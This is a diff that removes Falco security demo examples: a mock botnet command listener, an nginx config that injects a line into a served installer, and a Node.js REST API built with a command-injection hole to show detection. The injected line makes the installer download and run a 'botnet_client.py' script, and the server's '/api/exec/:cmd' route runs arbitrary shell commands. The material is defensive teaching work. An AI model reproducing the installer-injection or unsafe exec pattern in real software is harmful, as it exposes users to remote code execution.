signal.signal(signal.SIGINT,signal.SIG_IGN);
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', 1234))
serversocket.listen(5);
while 1:
    (clientsocket, address) = serversocket.accept();
    clientsocket.send('Waiting for botnet command and control commands...\n');
    command = clientsocket.recv(1024)
    clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
    clientsocket.close()

View File

@ -1,15 +0,0 @@
#!/bin/bash
SID=`ps --no-heading -o sess --pid $$`
if [ $SID -ne $$ ]; then
    # Not currently a session leader? Run a copy of ourself in a new
    # session, with copies of stdin/stdout/stderr.
    setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
    FBASH=$!
    trap "kill $FBASH; exit" SIGINT SIGTERM
    wait $FBASH
else
    # Just evaluate the commands (from stdin)
    source /dev/stdin
fi

View File

@ -1,12 +0,0 @@
http {
    server {
        location / {
            sub_filter_types '*';
            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
            sub_filter_once off;
            proxy_pass http://apache:80;
        }
    }
}
events {
}

View File

@ -1,156 +0,0 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
function install_rpm {
    if ! hash curl > /dev/null 2>&1; then
        echo "* Installing curl"
        yum -q -y install curl
    fi
    echo "*** Installing my-software public key"
    # A rpm --import command would normally be here
    echo "*** Installing my-software repository"
    # A curl path-to.repo <some url> would normally be here
    echo "*** Installing my-software"
    # A yum -q -y install my-software command would normally be here
    echo "*** my-software Installed!"
}
function install_deb {
    export DEBIAN_FRONTEND=noninteractive
    if ! hash curl > /dev/null 2>&1; then
        echo "* Installing curl"
        apt-get -qq -y install curl < /dev/null
    fi
    echo "*** Installing my-software public key"
    # A curl <url> | apt-key add - command would normally be here
    echo "*** Installing my-software repository"
    # A curl path-to.list <some url> would normally be here
    echo "*** Installing my-software"
    # An apt-get -qq -y install my-software command would normally be here
    echo "*** my-software Installed!"
}
function unsupported {
    echo 'Unsupported operating system. Please consider writing to the mailing list at'
    echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
    echo 'installation.'
    exit 1
}
if [ $(id -u) != 0 ]; then
    echo "Installer must be run as root (or with sudo)."
    # exit 1
fi
echo "* Detecting operating system"
ARCH=$(uname -m)
if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
    unsupported
fi
if [ -f /etc/debian_version ]; then
    if [ -f /etc/lsb-release ]; then
        . /etc/lsb-release
        DISTRO=$DISTRIB_ID
        VERSION=${DISTRIB_RELEASE%%.*}
    else
        DISTRO="Debian"
        VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
    fi
    case "$DISTRO" in
        "Ubuntu")
            if [ $VERSION -ge 10 ]; then
                install_deb
            else
                unsupported
            fi
            ;;
        "LinuxMint")
            if [ $VERSION -ge 9 ]; then
                install_deb
            else
                unsupported
            fi
            ;;
        "Debian")
            if [ $VERSION -ge 6 ]; then
                install_deb
            elif [[ $VERSION == *sid* ]]; then
                install_deb
            else
                unsupported
            fi
            ;;
        *)
            unsupported
            ;;
    esac
elif [ -f /etc/system-release-cpe ]; then
    DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
    VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
    case "$DISTRO" in
        "oracle" | "centos" | "redhat")
            if [ $VERSION -ge 6 ]; then
                install_rpm
            else
                unsupported
            fi
            ;;
        "amazon")
            install_rpm
            ;;
        "fedoraproject")
            if [ $VERSION -ge 13 ]; then
                install_rpm
            else
                unsupported
            fi
            ;;
        *)
            unsupported
            ;;
    esac
else
    unsupported
fi

View File

@ -1,66 +0,0 @@
# Demo of falco with bash exec via a poorly designed REST API.
## Introduction
This example shows how a server with a poorly designed API can allow a client to execute arbitrary programs on the server, and how that behavior can be detected using Sysdig Falco.
`server.js` in this directory defines the server. The poorly designed
API is this route handler:
```javascript
router.get('/exec/:cmd', function(req, res) {
    var ret = child_process.spawnSync(req.params.cmd, { shell: true});
    res.send(ret.stdout);
});
app.use('/api', router);
```
It blindly takes the URL portion after `/api/exec/<cmd>` and tries to execute it. A horrible design choice(!), but it allows us to easily show Sysdig Falco's capabilities.
## Demo architecture
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
* falco: will detect when you execute a shell via the express server.
### Access URLs under `/api/exec/<cmd>` to run arbitrary commands.
Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
```
$ curl http://localhost:8181/api/exec/ls
demo.yml
node_modules
package.json
README.md
server.js
```
```
$ curl http://localhost:8181/api/exec/pwd
.../examples/nodejs-bad-rest-api
```
### Try to run bash via `/api/exec/bash`, falco sends alert.
If you try to run bash via `/api/exec/bash`, falco will generate an alert:
```
falco | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
```
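For reference, the request that triggers this alert would look something like the following (a sketch, matching the earlier `/api/exec/<cmd>` examples):
```
$ curl http://localhost:8181/api/exec/bash
```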

View File

@ -1,21 +0,0 @@
express_server:
  container_name: express_server
  image: node:latest
  command: bash -c "apt-get -y update && apt-get -y install runit && cd /usr/src/app && npm install && runsv /usr/src/app"
  ports:
    - "8181:8181"
  volumes:
    - ${PWD}:/usr/src/app
falco:
  container_name: falco
  image: falcosecurity/falco:latest
  privileged: true
  volumes:
    - /var/run/docker.sock:/host/var/run/docker.sock
    - /dev:/host/dev
    - /proc:/host/proc:ro
    - /boot:/host/boot:ro
    - /lib/modules:/host/lib/modules:ro
    - /usr:/host/usr:ro
  tty: true

View File

@ -1,7 +0,0 @@
{
  "name": "bad-rest-api",
  "main": "server.js",
  "dependencies": {
    "express": "~4.16.0"
  }
}

View File

@ -1,2 +0,0 @@
#!/bin/sh
node server.js

View File

@ -1,25 +0,0 @@
var express = require('express'); // call express
var app = express(); // define our app using express
var child_process = require('child_process');
var port = process.env.PORT || 8181; // set our port
// ROUTES FOR OUR API
// =============================================================================
var router = express.Router(); // get an instance of the express Router
// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
router.get('/', function(req, res) {
    res.json({ message: 'API available'});
});
router.get('/exec/:cmd', function(req, res) {
    var ret = child_process.spawnSync(req.params.cmd, { shell: true});
    res.send(ret.stdout);
});
app.use('/api', router);
app.listen(port);
console.log('Server running on port: ' + port);